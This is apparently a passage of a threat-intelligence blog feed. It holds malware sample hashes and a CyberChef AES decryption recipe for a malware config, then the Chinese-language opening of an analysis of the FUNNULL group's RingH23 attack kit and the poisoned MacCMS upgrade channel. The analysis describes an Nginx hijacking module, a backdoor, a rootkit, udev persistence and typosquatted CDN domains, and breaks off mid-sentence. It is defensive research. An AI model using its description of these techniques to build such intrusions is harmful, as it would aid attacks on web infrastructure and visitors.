3bff298be46f8817862bce2ac0be3176 *kernel.so
6acb8bbcad3b8403f4567412cc6aa144 *kernel.so
946606977dd177347122867750244ae2 *kernel.so
92c630062f0fe207c628b95fade34b96 *kernel.so
563f5e605ebf1db8065fd41799e71bf9 *module.so
112e2eb2a57129ef175c3f64bccbac04 *module.so
cd36ec10f71b89dc259eb8825e668ae3 *module.so
6e14853a6ad5e752a516290bf586d700 *udev.rule
b5dfe88131fb1b3622a487df96be84e1 *udev.sh
79c492bfd8a35039249bacc6a31d7122 *ring04h_office_bin
2e7a42c9be6fc3840df867cb19c7afa5 *ring04h_office_bin
a688afd342cee9feb74c61503fb0b895 *ring04h_office_bin
85f3d29a8fd59e00fec83743664fb2b5 *ring04h_office_bin
fef497841554fff318b740dff7df3a49 *ring04h_office_bin
dfd1fbf0a98e0984da9516311ccc1f05 *ring04h_office_bin
da594309691161f6e999984c26e1a10f *ring04h_office_bin
18b699375c76328b433145bdac02ec49 *ring04h_office_bin
d3b0b6496747ee77ab15e5f5d9583a67 *ring04h_office_bin

b5a5d93cfc443ecbd3b52cfe485b738c *shell.plugin
296318b90bc9d01ab045da042b0ecb21 *filesearch.plugin
b8239ce64c07e39ae7bed9ae8f5f3d2f *filemanager.plugin
51830656b0825b22703e4fcf31aec84c *filetransport.plugin
22f0d58bc482d413a5cc8922c7f79378 *filedownloader.plugin

b06b9f13505eb49d6b3f4bddd64b12ce *active.php
eb03db7ac9f10af66a1e2b16185fcadc *addons.php

</code></pre>
<h1 id="cyberchef">Cyberchef</h1>
<pre><code>https://gchq.github.io/CyberChef/#recipe=From_Hexdump()AES_Decrypt(%7B&apos;option&apos;:&apos;Latin1&apos;,&apos;string&apos;:&apos;2B990667D0E087AE&apos;%7D,%7B&apos;option&apos;:&apos;Latin1&apos;,&apos;string&apos;:&apos;27FAD11C481BD789&apos;%7D,&apos;CBC&apos;,&apos;Raw&apos;,&apos;Raw&apos;,%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;&apos;%7D,%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;&apos;%7D)Drop_bytes(0,4,false)Zlib_Inflate(0,0,&apos;Adaptive&apos;,false,false)To_Hexdump(16,false,false,false)&amp;input=MDAwMDAwMDAgIDBlIDFkIDg1IDU0IDI4IDEyIGZiIGYyICA5YSAzYyBkZCAwMiA2YyA4MyBlZCBmOSAgIC4uLlQoLi4uIC48Li5sLi4uDQowMDAwMDAxMCAgODcgM2QgMGQgNDYgMWMgOTQgOWQgNDYgIDI2IDU1IDVjIDJhIDlhIDcyIDFjIGFhICAgLj0uRi4uLkYgJlVcKi5yLi4&amp;ieol=CRLF
</code></pre>
]]></content:encoded></item><item><title><![CDATA[围剿FUNNULL黑产：深度揭秘RingH23与MacCMS投毒攻击链]]></title><description><![CDATA[<h1 id="%E8%83%8C%E6%99%AF%E4%BB%8B%E7%BB%8D">&#x80CC;&#x666F;&#x4ECB;&#x7ECD;</h1>
<p><strong>Funnull</strong>&#xFF08;&#x5168;&#x79F0; Funnull Technology Inc.&#xFF0C;&#x4E2D;&#x6587;&#x53C8;&#x79F0;&#x65B9;&#x80FD;CDN&#x6216;&#x65B9;&#x80FD;&#x79D1;&#x6280;&#xFF09;&#x662F;&#x4E00;&#x5BB6;&#x6CE8;&#x518C;&#x5728;&#x83F2;&#x5F8B;&#x5BBE;&#x7684;&#x516C;&#x53F8;&#xFF0C;&#x8868;&#x9762;&#x4E0A;&#x770B;&#x662F;&#x4E00;&#x5BB6;&#x63D0;&#x4F9B;CDN&#xFF08;&#x5185;</p>]]></description><link>https://blog.xlab.qianxin.com/exposing-funnull-how-ringh23-maccms-are-poisoning-the-web/</link><guid isPermaLink="false">686ca0386bb47b000119303b</guid><category><![CDATA[FUNNULL]]></category><category><![CDATA[Backdoor]]></category><category><![CDATA[CN]]></category><category><![CDATA[DoH]]></category><category><![CDATA[Supply Chain]]></category><dc:creator><![CDATA[Alex.Turing]]></dc:creator><pubDate>Fri, 27 Feb 2026 04:26:23 GMT</pubDate><content:encoded><![CDATA[<h1 id="%E8%83%8C%E6%99%AF%E4%BB%8B%E7%BB%8D">&#x80CC;&#x666F;&#x4ECB;&#x7ECD;</h1>
<p><strong>Funnull</strong>&#xFF08;&#x5168;&#x79F0; Funnull Technology Inc.&#xFF0C;&#x4E2D;&#x6587;&#x53C8;&#x79F0;&#x65B9;&#x80FD;CDN&#x6216;&#x65B9;&#x80FD;&#x79D1;&#x6280;&#xFF09;&#x662F;&#x4E00;&#x5BB6;&#x6CE8;&#x518C;&#x5728;&#x83F2;&#x5F8B;&#x5BBE;&#x7684;&#x516C;&#x53F8;&#xFF0C;&#x8868;&#x9762;&#x4E0A;&#x770B;&#x662F;&#x4E00;&#x5BB6;&#x63D0;&#x4F9B;CDN&#xFF08;&#x5185;&#x5BB9;&#x5206;&#x53D1;&#x7F51;&#x7EDC;&#xFF09;&#x670D;&#x52A1;&#x7684;&#x516C;&#x53F8;&#xFF0C;&#x4F46;&#x5B9E;&#x9645;&#x4E0A;&#x5B83;&#x662F;&#x4E1C;&#x5357;&#x4E9A;&#x7F51;&#x7EDC;&#x9ED1;&#x4EA7;&#x94FE;&#x6761;&#x4E2D;&#x975E;&#x5E38;&#x91CD;&#x8981;&#x7684;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x63D0;&#x4F9B;&#x5546;&#xFF0C;&#x4E13;&#x4E3A;&#x201C;&#x6740;&#x732A;&#x76D8;&#x201D;&#x7F51;&#x7EDC;&#x8BC8;&#x9A97;&#x63D0;&#x4F9B;&#x4E00;&#x7AD9;&#x5F0F;&#x670D;&#x52A1;&#xFF0C;&#x88AB;&#x7F8E;&#x56FD;&#x653F;&#x5E9C;&#x660E;&#x786E;&#x5B9A;&#x6027;&#x4E3A;&#x91CD;&#x5927;&#x7F51;&#x7EDC;&#x72AF;&#x7F6A;&#x652F;&#x6301;&#x8005;&#xFF0C;&#x5728;&#x4E2D;&#x56FD;&#x9ED1;&#x7070;&#x4EA7;&#x5708;&#x5185;&#x4E5F;&#x957F;&#x671F;&#x88AB;&#x89C6;&#x4E3A;&#x201C;&#x8BC8;&#x9A97;&#x4E13;&#x7528;&#x4E91;&#x201D;&#x3002;2025&#x5E74;5&#x6708;29&#x65E5;&#x7F8E;&#x56FD;&#x8D22;&#x653F;&#x90E8;&#x5916;&#x56FD;&#x8D44;&#x4EA7;&#x63A7;&#x5236;&#x529E;&#x516C;&#x5BA4;&#xFF08;OFAC&#xFF09;&#x6B63;&#x5F0F;&#x5BA3;&#x5E03;&#x5BF9;Funnull&#x9ED1;&#x4EA7;&#x56E2;&#x4F19;&#x8FDB;&#x884C;&#x5236;&#x88C1;&#xFF0C;&#x4E4B;&#x540E; <strong>Funnull &#x7684;&#x516C;&#x5F00;&#x8FD0;&#x8425;&#x57FA;&#x672C;&#x9677;&#x4E8E;&#x505C;&#x6EDE;</strong>&#x3002;&#x7136;&#x800C;&#x7F51;&#x7EDC;&#x9ED1;&#x4EA7;&#x94FE;&#x6761;&#x7684;&#x5F80;&#x5F80;&#x6709;&#x6781;&#x5F3A;&#x7684;&#x97E7;&#x6027;&#xFF0C;Funnull&#x8FD9;&#x6837;&#x7684;&#x8001;&#x724C;&#x4E13;&#x4E1A;&#x56E2;&#x961F;&#x66F4;&#x662F;&#x5982;&#x6B64;&#xFF0C;&#x201C;&#x88AB;&#x6253;&#x51FB;&#x3001;&#x6F5C;&#x4F0F;&#x3001;&#x518D;&#x5EA6;&#x56DE;&#x5F52;&#x201D;&#x51E0;&#x4E4E;&#x6210;&#x4E3A;&#x5176;&#x751F;&#x5B58;&#x5E38;&#x6001;&#xFF0C;<strong>&#x6211;&#x4EEC;&#x7684;&#x6700;&#x65B0;&#x7814;&#x7A76;&#x8868;&#x660E;Funnull&#x5DF2;&#x6362;&#x76AE;&#x590D;&#x6D3B;</strong>&#x3002;</p>
<p>&#x65F6;&#x95F4;&#x56DE;&#x5230;2025&#x5E74;7&#x6708;9&#x65E5;&#xFF0C;<strong>Xlab&#x5927;&#x7F51;&#x5A01;&#x80C1;&#x611F;&#x77E5;&#x7CFB;&#x7EDF;</strong>&#x76D1;&#x6D4B;&#x5230;&#x57DF;&#x540D;download.zhw.sh&#x6B63;&#x5728;&#x4F20;&#x64AD;&#x4E00;&#x4E2A;VT 0 &#x68C0;&#x6D4B;&#x7684;ELF&#x6587;&#x4EF6;&#x3002;&#x9996;&#x5148;&#x5F15;&#x8D77;&#x6CE8;&#x610F;&#x7684;&#x662F;&#x8BBF;&#x95EE;hxxp://zhw.]sh&#x663E;&#x793A;&#x7684;&#x56FE;&#x7247;&#xFF0C;&#x8BA9;&#x6211;&#x4EEC;&#x76F4;&#x547C;&#x771F;&#x662F;&#x80C6;&#x5927;&#x5305;&#x5929;&#x3002;&#x66F4;&#x503C;&#x5F97;&#x8B66;&#x60D5;&#x7684;&#x662F;&#xFF0C;&#x6837;&#x672C;&#x4E2D;&#x6D89;&#x53CA;&#x7684;&#x57DF;&#x540D;&#x201C;client.110.nz&#x201D;&#x5728;&#x6211;&#x4EEC;&#x7684;PDNS&#x7CFB;&#x7EDF;&#x4E2D;&#x663E;&#x793A;&#x89E3;&#x6790;&#x6B21;&#x6570;&#x9AD8;&#x8FBE;16&#x4EBF;&#x6B21;&#xFF0C;&#x79CD;&#x79CD;&#x5F02;&#x5E38;&#x8FF9;&#x8C61;&#x8868;&#x660E;&#xFF0C;&#x8FD9;&#x4F3C;&#x4E4E;&#x662F;&#x4E00;&#x6761;&#x201C;&#x5927;&#x9C7C;&#x201D;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/turing_180m.png" alt="turing_180m.png" loading="lazy"></p>
<p>&#x5728;&#x6FC0;&#x52A8;&#x7684;&#x5FC3;&#x60C5;&#x4E2D;&#xFF0C;&#x6211;&#x4EEC;&#x5F00;&#x59CB;&#x4E86;&#x5206;&#x6790;&#x4E4B;&#x65C5;&#xFF0C;&#x5F88;&#x5FEB;&#x5C31;&#x6709;&#x4E86;&#x521D;&#x6B65;&#x7ED3;&#x8BBA;&#xFF1A;&#x8FD9;&#x4E2A;ELF&#x6587;&#x4EF6;&#x662F;&#x4E00;&#x4E2A;&#x4E0B;&#x8F7D;&#x5668;&#xFF0C;&#x5B83;&#x4F1A;&#x5411;&#x8FDC;&#x7A0B;&#x670D;&#x52A1;&#x5668;&#x8BF7;&#x6C42;udev.sh, udev.rules, module.so, libutilkeybd.so, ring04h_office_bin&#x7B49;&#x591A;&#x4E2A;&#x8F7D;&#x8377;&#xFF0C;&#x4F46;&#x7531;&#x4E8E;&#x7F3A;&#x4E4F;&#x6709;&#x6548;&#x7684;&#x4F1A;&#x8BDD;&#x4EE4;&#x724C;&#xFF08;session token&#xFF09;&#x4E0E;&#x7FA4;&#x7EC4;&#x5BC6;&#x94A5;&#xFF08;group key&#xFF09;&#xFF0C;&#x6211;&#x4EEC;&#x672A;&#x80FD;&#x901A;&#x8FC7;&#x670D;&#x52A1;&#x5668;&#x7684;&#x6821;&#x9A8C;&#x673A;&#x5236;&#xFF0C;&#x6CA1;&#x6709;&#x6355;&#x83B7;&#x8FD9;&#x4E9B;&#x540E;&#x7EED;&#x6837;&#x672C;&#x3002;&#x7136;&#x800C;&#xFF0C;&#x6839;&#x636E;&#x8FD9;&#x4E9B;Payload&#x7684;&#x76EE;&#x7684;&#x2014;&#x2014;&#x5982;libutilkeybd.so&#x7528;&#x4E8E;&#x901A;&#x8FC7; Preload &#x673A;&#x5236;&#x5B9E;&#x73B0;&#x52AB;&#x6301;&#xFF0C;udev.rules&#x7528;&#x4E8E;&#x901A;&#x8FC7;Udev&#x673A;&#x5236;&#x5B9E;&#x73B0;&#x6301;&#x4E45;&#x5316;&#x2014;&#x2014;&#x6211;&#x4EEC;&#x9AD8;&#x5EA6;&#x786E;&#x4FE1;&#xFF0C;<strong>&#x8FD9;&#x4E2A;&#x4E0B;&#x8F7D;&#x5668;&#x662F;&#x4E00;&#x4E2A;&#x6076;&#x610F;&#x8F6F;&#x4EF6;</strong>&#x3002;</p>
<p>&#x4E3A;&#x67E5;&#x660E;&#x8FD9;&#x4E2A;&#x4E0B;&#x8F7D;&#x5668;&#x7684;&#x771F;&#x5B9E;&#x610F;&#x56FE;&#xFF0C;&#x6211;&#x4EEC;&#x4EE5;&#x6587;&#x4EF6;&#x540D;&#x4E3A;&#x7EBF;&#x7D22;&#x8FDB;&#x884C;&#x4E3B;&#x52A8;&#x72E9;&#x730E;&#xFF0C;&#x8FC5;&#x901F;&#x9501;&#x5B9A;&#x5173;&#x952E;&#x7EC4;&#x4EF6;&#xFF1A;module.so &#x4E0E; libutilkeybd.so&#xFF1B;&#x4E00;&#x4E2A;&#x6708;&#x4E4B;&#x540E;&#xFF0C;&#x6211;&#x4EEC;&#x8FDB;&#x4E00;&#x6B65;&#x53D1;&#x73B0;&#x4E86;&#x5230;&#x9996;&#x4E2A; ring04h_office_bin &#x6837;&#x672C;&#x3002;&#x8FD9;&#x4E9B;&#x6837;&#x672C;&#x7684;&#x76F8;&#x7EE7;&#x6355;&#x83B7;&#xFF0C;&#x9010;&#x6B65;&#x62FC;&#x51D1;&#x51FA;&#x4E00;&#x4E2A;&#x653B;&#x51FB;&#x94FE;&#x6761;&#xFF1A;&#x653B;&#x51FB;&#x8005;&#x9996;&#x5148;&#x5165;&#x4FB5;GoEdge&#x7BA1;&#x7406;&#x8282;&#x70B9;&#xFF0C;&#x5E76;&#x690D;&#x5165;&#x611F;&#x67D3;&#x6A21;&#x5757; <code>infection_init</code>&#x3002;&#x8BE5;&#x6A21;&#x5757;&#x968F;&#x540E;&#x901A;&#x8FC7;SSH&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#xFF0C;&#x5F3A;&#x5236;&#x6240;&#x6709;&#x8FB9;&#x7F18;&#x8282;&#x70B9;&#x4E0B;&#x8F7D;&#x5E76;&#x6267;&#x884C; <code>downloader_init</code>&#x3002;download_init&#xFF0C;&#x5373;&#x662F;&#x4E0A;&#x6587;&#x6240;&#x8BF4;&#x7684;&#x4E0B;&#x8F7D;&#x5668;&#xFF0C;&#x5B83;&#x4F1A;&#x5728;&#x53D7;&#x63A7;&#x8282;&#x70B9;&#x4E0A;&#x90E8;&#x7F72;&#x4EE5;&#x4E0B;&#x4E00;&#x7CFB;&#x5217;&#x6076;&#x610F;&#x8F7D;&#x8377;&#xFF0C;&#x5F88;&#x660E;&#x663E;&#x8FD9;&#x662F;&#x4E00;&#x4E2A;&#x5206;&#x5DE5;&#x975E;&#x5E38;&#x660E;&#x786E;&#x7684;&#x653B;&#x51FB;&#x5957;&#x4EF6;&#xFF0C;&#x57FA;&#x4E8E;&#x6837;&#x672C;&#x4E2D;&#x53CD;&#x590D;&#x51FA;&#x73B0;&#x7684;&#x5B57;&#x4E32;RING04H,&#x4EE5;&#x53CA;office_bin&#x6A21;&#x5757;&#x4F7F;&#x7528;xor 23&#x89E3;&#x5BC6;&#x914D;&#x7F6E;&#x6587;&#x4EF6;&#xFF0C;&#x8FD9;&#x4E2A;&#x653B;&#x51FB;&#x5957;&#x4EF6;&#x88AB;&#x6211;&#x4EEC;&#x547D;&#x540D;&#x4E3A;<strong>RingH23</strong>&#xFF0C;&#x5B83;&#x5305;&#x542B;Badnginx2s&#xFF0C;Badredis2s&#xFF0C;Badhide2s&#x7B49;&#x4E0D;&#x540C;&#x76EE;&#x7684;&#x7EC4;&#x4EF6;&#x3002;</p>
<ul>
<li>
<p><strong>udev.sh &amp; udev.rules</strong>&#xFF1A;&#x975E;&#x5E38;&#x5C11;&#x89C1;&#x7684;Udev&#x6301;&#x4E45;&#x5316;&#x811A;&#x672C;&amp;&#x89C4;&#x5219;</p>
</li>
<li>
<p><strong>module.so</strong>&#xFF1A;&#x975E;&#x5E38;&#x5C11;&#x89C1;&#x7684;Nginx&#x6076;&#x610F;&#x6A21;&#x5757;&#xFF0C;&#x8D1F;&#x8D23;&#x4E0B;&#x8F7D;&#x52AB;&#x6301;&#xFF0C;&#x6570;&#x5B57;&#x94B1;&#x5305;&#x66FF;&#x6362;&#xFF0C;&#x4EE5;&#x53CA;&#x5411;&#x7F51;&#x9875;&#x6CE8;&#x5165;&#x6076;&#x610F;JavaScript&#x4EE3;&#x7801;&#xFF0C;&#x88AB;&#x547D;&#x540D;&#x4E3A;Badnginx2s</p>
</li>
<li>
<p><strong>ring04h_office_bin</strong>&#xFF1A;&#x540E;&#x95E8;&#x6A21;&#x5757;&#xFF0C;&#x7528;&#x4E8E;&#x7EF4;&#x6301;&#x5BF9;&#x8282;&#x70B9;&#x7684;&#x957F;&#x671F;&#x6301;&#x4E45;&#x5316;&#x8BBF;&#x95EE;&#xFF0C;C2&#x4FDD;&#x5B58;&#x5728;Azure Blob Storage&#xFF0C;&#x88AB;&#x547D;&#x540D;&#x4E3A;Badredis2s</p>
</li>
<li>
<p><strong>libutilkeybd.so</strong>&#xFF1A;&#x7528;&#x6237;&#x6001;Rootkit&#x6A21;&#x5757;&#xFF0C;&#x7528;&#x4E8E;&#x9690;&#x85CF;Payload&#x7684;&#x6D3B;&#x52A8;&#x75D5;&#x8FF9;,&#x88AB;&#x547D;&#x540D;&#x4E3A;Badhide2s</p>
</li>
</ul>
<p>&#x6B64;&#x6B21;&#x653B;&#x51FB;&#x6D3B;&#x52A8;&#x7684;&#x6838;&#x5FC3;&#x76EE;&#x7684;&#x4E4B;&#x4E00;&#xFF0C;&#x662F;&#x5728;&#x5411;&#x7F51;&#x9875;&#x4E2D;&#x690D;&#x5165;&#x6076;&#x610F;JavaScript&#x4EE3;&#x7801;&#xFF0C;&#x4ECE;&#x800C;&#x5C06;&#x8BBF;&#x95EE;&#x8005;&#x52AB;&#x6301;&#x5E76;&#x8DF3;&#x8F6C;&#x81F3;&#x535A;&#x5F69;&#x3001;&#x8272;&#x60C5;&#x7B49;&#x975E;&#x6CD5;&#x7F51;&#x7AD9;&#x3002;&#x8FD9;&#x4E9B;&#x6076;&#x610F;&#x811A;&#x672C;&#x6258;&#x7BA1;&#x4E8E;&#x6570;&#x4E2A;<strong>&#x516C;&#x5171;&#x9759;&#x6001;&#x8D44;&#x6E90;&#x5E93;CDN&#x7684;&#x9AD8;&#x4EFF;&#x57DF;&#x540D;</strong>&#x3002;</p>
<ul>
<li>code.jquecy[.]com&#xFF0C;&#x4EFF;&#x5192;jquery.com</li>
<li>cdn.jsdclivr[.]com&#xFF0C;&#x4EFF;&#x5192;jsdelivr.com</li>
<li>cdnjs.clondflare[.]com&#xFF0C;&#x4EFF;&#x5192;cloudflare.com</li>
<li>static.bytedauce[.]com&#xFF0C;&#x4EFF;&#x5192;bytedance.com</li>
</ul>
<p>&#x8FD9;&#x6279;&#x57DF;&#x540D;&#x4E8E;2025&#x5E74;&#x521B;&#x5EFA;&#xFF0C;&#x4ECE;&#x6211;&#x4EEC;&#x7684;&#x6570;&#x636E;&#x89C6;&#x91CE;&#x6765;&#x770B;&#xFF0C;&#x5B83;&#x4EEC;&#x7684;&#x5F71;&#x54CD;&#x8303;&#x56F4;&#x5DF2;&#x7ECF;&#x975E;&#x5E38;&#x5E7F;&#x6CDB;&#x3002;&#x4EE5;clondflare&#x4E3A;&#x4F8B;&#xFF0C;&#x8BBF;&#x95EE;&#x5CF0;&#x503C;&#x5728;2025&#x5E74;8&#x6708;30&#x65E5;&#xFF0C;&#x5F53;&#x5929;&#x53BB;&#x91CD;&#x5BA2;&#x6237;&#x7AEF;&#x9AD8;&#x8FBE;34&#x4E07;&#x3002;&#x9700;&#x8981;&#x5F3A;&#x8C03;&#x7684;&#x662F;&#xFF0C;&#x6211;&#x4EEC;&#x6570;&#x636E;&#x6E90;&#x5728;&#x56FD;&#x5185;&#x7EA6;&#x5360;5%&#x7684;&#x5E02;&#x573A;&#x4EFD;&#x989D;&#xFF0C;&#x6309;&#x7167;&#x8FD9;&#x4E2A;&#x6BD4;&#x5217;&#x63A8;&#x7B97;&#xFF0C;clondflare&#x5F53;&#x5929;&#x5728;&#x5168;&#x56FD;&#x8303;&#x56F4;&#x5185;&#x53EF;&#x80FD;&#x88AB;<strong>680&#x4E07;&#x7528;&#x6237;&#x4E3B;&#x89C2;&#x6216;&#x88AB;&#x52A8;&#x8BBF;&#x95EE;</strong>&#xFF0C;&#x5176;&#x5F71;&#x54CD;&#x89C4;&#x6A21;&#x4EE4;&#x4EBA;&#x5482;&#x820C;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_clondflare.png" alt="ring_clondflare.png" loading="lazy"></p>
<p>&#x5F88;&#x660E;&#x663E;&#xFF0C;&#x6B64;&#x6B21;&#x653B;&#x51FB;&#x6D3B;&#x52A8;&#x80CC;&#x540E;&#x7684;&#x56E2;&#x4F19;&#x7EDD;&#x975E;&#x666E;&#x901A;&#x9ED1;&#x5BA2;&#xFF0C;&#x6211;&#x4EEC;&#x4EE5;&#x6076;&#x610F;JavaScript&#x4EE3;&#x7801;&#x4E3A;&#x7EBF;&#x7D22;&#x5C55;&#x5F00;&#x6EAF;&#x6E90;&#x5206;&#x6790;&#xFF0C;&#x60CA;&#x5947;&#x5730;&#x53D1;&#x73B0;&#xFF1A;&#x672C;&#x6B21;&#x6D3B;&#x52A8;&#x4F7F;&#x7528;&#x7684;JS&#x4EE3;&#x7801;&#x4E0E;2024&#x5E74;2&#x6708;Polyfill.io&#x4F9B;&#x5E94;&#x94FE;&#x653B;&#x51FB;&#x4EE5;&#x53CA;&#x540C;&#x5E74;5&#x6708;GoEdge&#x906D;&#x5B98;&#x65B9;&#x6295;&#x6BD2;&#x4FE9;&#x6B21;&#x653B;&#x51FB;&#x4E8B;&#x4EF6;&#x4E2D;&#x6240;&#x4F7F;&#x7528;&#x7684;&#x6076;&#x610F;&#x811A;&#x672C;&#x5982;&#x51FA;&#x4E00;&#x8F99;&#x3002;&#x8FD9;&#x4E9B;&#x653B;&#x51FB;&#x7684;&#x9ED1;&#x624B;&#x6B63;&#x662F;&#x81ED;&#x540D;&#x662D;&#x8457;&#x7684;<strong>Funnull&#x9ED1;&#x4EA7;&#x7EC4;&#x7EC7;</strong>&#x3002;</p>
<p>&#x968F;&#x7740;&#x8C03;&#x67E5;&#x8FDB;&#x4E00;&#x6B65;&#x6DF1;&#x5165;&#xFF0C;&#x6211;&#x4EEC;&#x53D1;&#x73B0;Funnull&#x9488;&#x5BF9;&#x5F00;&#x6E90;&#x4F9B;&#x5E94;&#x94FE;&#x53CA;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x65B9;&#x9762;&#x7684;&#x653B;&#x51FB;&#x6D3B;&#x52A8;&#x5E76;&#x6CA1;&#x6709;&#x505C;&#x6B62;&#x3002;&#x9664;&#x4E86;&#x4E0A;&#x8FF0;&#x77E5;&#x540D;CDN&#x670D;&#x52A1;&#xFF0C;&#x8BE5;&#x7EC4;&#x7EC7;&#x8FD8;&#x5C06;&#x9ED1;&#x624B;&#x4F38;&#x5411;&#x4E86;&#x5F71;&#x89C6;&#x5185;&#x5BB9;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#x9886;&#x57DF;&#x2014;&#x2014;<strong>&#x6211;&#x4EEC;&#x786E;&#x8BA4;&#x82F9;&#x679C;CMS&#xFF08;maccms.la&#x7248;&#xFF09;&#x4F7F;&#x7528;&#x76F8;&#x540C;&#x7684;JS&#x811A;&#x672C;&#x8FDB;&#x884C;&#x9690;&#x853D;&#x7684;&#x6295;&#x6BD2;&#x653B;&#x51FB;</strong>&#x3002;</p>
<p>&#x4EE5;&#x4E0B;&#x4E3A;&#x672C;&#x6B21;&#x7814;&#x7A76;&#x7684;&#x6838;&#x5FC3;&#x53D1;&#x73B0;&#xFF1A;</p>
<ol>
<li>Funnull&#x6362;&#x9A6C;&#x7532;&#x56DE;&#x5F52;&#xFF0C;&#x800C;&#x4E14;&#x5168;&#x9762;&#x5347;&#x7EA7;&#x3002;</li>
</ol>
<p>Funnull&#x53C8;&#x56DE;&#x6765;&#x4E86;&#xFF0C;&#x5B83;&#x662F;2024&#x5E74;Polyfill.io&#x4F9B;&#x5E94;&#x94FE;&#x653B;&#x51FB;&#xFF0C;&#x662F;&#x6B64;&#x524D;BootCDN&#x3001;Bootcss&#x3001;Staticfile&#x7B49;&#x591A;&#x8D77;CDN&#x6295;&#x6BD2;&#x4E8B;&#x4EF6;&#x7684;&#x5E55;&#x540E;&#x9ED1;&#x624B;&#xFF0C;&#x662F;&#x88AB;&#x7F8E;&#x56FD;&#x8D22;&#x653F;&#x90E8;&#x70B9;&#x540D;&#x534F;&#x52A9;&quot;&#x6740;&#x732A;&#x76D8;&quot;&#x9A97;&#x5C40;&#x3001;&#x53D7;&#x5BB3;&#x8005;&#x62A5;&#x544A;&#x635F;&#x5931;&#x8D85;2&#x4EBF;&#x7F8E;&#x5143;&#x7684;&#x90A3;&#x4E2A;&#x9ED1;&#x4EA7;&#x7EC4;&#x7EC7;&#x3002;&#x4ED6;&#x4EEC;&#x7684;&#x4E4B;&#x524D;&#x7684;&#x4E3B;&#x8981;&#x624B;&#x6CD5;&#x662F;&#x5BC4;&#x751F;&#x5728;&#x5DF2;&#x6709;&#x7684;&#x516C;&#x5171;CDN&#x670D;&#x52A1;&#x4E0A;&#x6295;&#x6BD2;&#xFF1B;&#x800C;&#x73B0;&#x5728;&#x5DF2;&#x8FDB;&#x5316;&#x5230;&#x81EA;&#x4E3B;&#x5F00;&#x53D1;&#x5B8C;&#x6574;&#x7684;&#x670D;&#x52A1;&#x5668;&#x7AEF;&#x653B;&#x51FB;&#x5957;&#x4EF6;&#xFF08;RingH23&#xFF09;&#xFF0C;&#x4E3B;&#x52A8;&#x5165;&#x4FB5;CDN&#x8282;&#x70B9;&#xFF0C;&#x63A7;&#x5236;&#x529B;&#x548C;&#x6280;&#x672F;&#x6DF1;&#x5EA6;&#x90FD;&#x4E0A;&#x4E86;&#x4E00;&#x4E2A;&#x53F0;&#x9636;&#x3002;</p>
<ol start="2">
<li>&#x4E24;&#x6761;&#x72EC;&#x7ACB;&#x7684;&#x4F9B;&#x5E94;&#x94FE;&#x611F;&#x67D3;&#x901A;&#x9053;&#x3002;</li>
</ol>
<p>&#x8DEF;&#x5F84;&#x4E00;&#xFF1A;&#x82F9;&#x679C;CMS&#xFF08;maccms.la&#xFF09;&#x5B98;&#x65B9;&#x5347;&#x7EA7;&#x901A;&#x9053;&#x6295;&#x6BD2;&#x3002; &#x82F9;&#x679C;CMS&#x662F;&#x4E00;&#x4E2A;GitHub&#x4E0A;&#x79EF;&#x7D2F;2,700+&#x661F;&#x6807;&#x7684;&#x5F00;&#x6E90;&#x5F71;&#x89C6;&#x5EFA;&#x7AD9;&#x7CFB;&#x7EDF;&#xFF0C;&#x5728;&#x4E2D;&#x56FD;&#x4E2D;&#x5C0F;&#x578B;&#x5F71;&#x89C6;&#x7AD9;&#x957F;&#x4E2D;&#x62E5;&#x6709;&#x6781;&#x9AD8;&#x666E;&#x53CA;&#x7387;&#x3002;&#x73B0;&#x5728;&#x770B;&#x6765;&#x5B83;&#x5DF2;&#x843D;&#x5165;&#x4E86;Funnull&#x9ED1;&#x4EA7;&#x7EC4;&#x7EC7;&#x4E4B;&#x624B;&#xFF0C;<strong>&#x73B0;&#x5DF2;&#x6709;&#x660E;&#x786E;&#x8BC1;&#x636E;&#x8868;&#x660E;&#xFF0C;maccms.la&#x5B98;&#x65B9;&#x901A;&#x8FC7;&#x5347;&#x7EA7;&#x901A;&#x9053;&#x4E0B;&#x53D1;&#x6076;&#x610F;PHP&#x540E;&#x95E8;</strong>&#x3002;&#x6295;&#x6BD2;&#x8BBE;&#x8BA1;&#x975E;&#x5E38;&#x72E1;&#x733E;&#x2014;&#x2014;&#x7528;&#x6237;&#x5B89;&#x88C5;&#x540E;&#x9996;&#x6B21;&#x767B;&#x5F55;&#x7BA1;&#x7406;&#x540E;&#x53F0;&#x65F6;&#x89E6;&#x53D1;&#xFF0C;payload&#x8BBE;&#x6709;3&#x5206;&#x949F;&#x65F6;&#x6548;&#x7A97;&#x53E3;&#xFF0C;&#x4E0B;&#x8F7D;&#x6210;&#x529F;&#x4E4B;&#x540E;&#x6216;&#x8FC7;&#x671F;&#x5373;&#x65E0;&#x6CD5;&#x8BBF;&#x95EE;&#xFF0C;&#x6709;&#x6548;&#x89C4;&#x907F;&#x4E8B;&#x540E;&#x53D6;&#x8BC1;&#x3002;</p>
<p>&#x8DEF;&#x5F84;&#x4E8C;&#xFF1A;GoEdge&#x7BA1;&#x7406;&#x8282;&#x70B9; &#x2192; SSH&#x6A2A;&#x5411;&#x6269;&#x6563; &#x2192; RingH23&#x5957;&#x4EF6;&#x90E8;&#x7F72;&#x3002; &#x653B;&#x51FB;&#x8005;&#x5165;&#x4FB5;GoEdge CDN&#x7BA1;&#x7406;&#x8282;&#x70B9;&#xFF0C;&#x690D;&#x5165;&#x611F;&#x67D3;&#x6A21;&#x5757;&#xFF0C;&#x968F;&#x540E;&#x901A;&#x8FC7;SSH&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#x5C06;&#x653B;&#x51FB;&#x5957;&#x4EF6;RingH23&#x5F3A;&#x5236;&#x90E8;&#x7F72;&#x5230;&#x6240;&#x6709;&#x8FB9;&#x7F18;&#x8282;&#x70B9;&#x3002;&#x8BE5;&#x5957;&#x4EF6;&#x5305;&#x542B;Badredis2s, Badnginx2s, 